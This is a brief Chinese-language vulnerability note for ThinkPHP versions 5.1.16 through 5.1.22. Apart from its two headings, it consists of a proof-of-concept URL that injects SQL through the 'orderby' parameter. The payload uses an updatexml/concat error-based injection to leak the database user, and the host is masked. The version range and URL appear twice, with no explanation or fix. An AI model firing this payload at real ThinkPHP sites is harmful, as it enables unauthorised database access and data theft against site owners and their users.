漏洞影响
5.1.16 <= ThinkPHP <= 5.1.22
漏洞POC
http://********/index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1
5.1.16 <= ThinkPHP <= 5.1.22
http://********/index/index/index?orderby[id`|updatexml(1,concat(0x7,user(),0x7e),1)%23]=1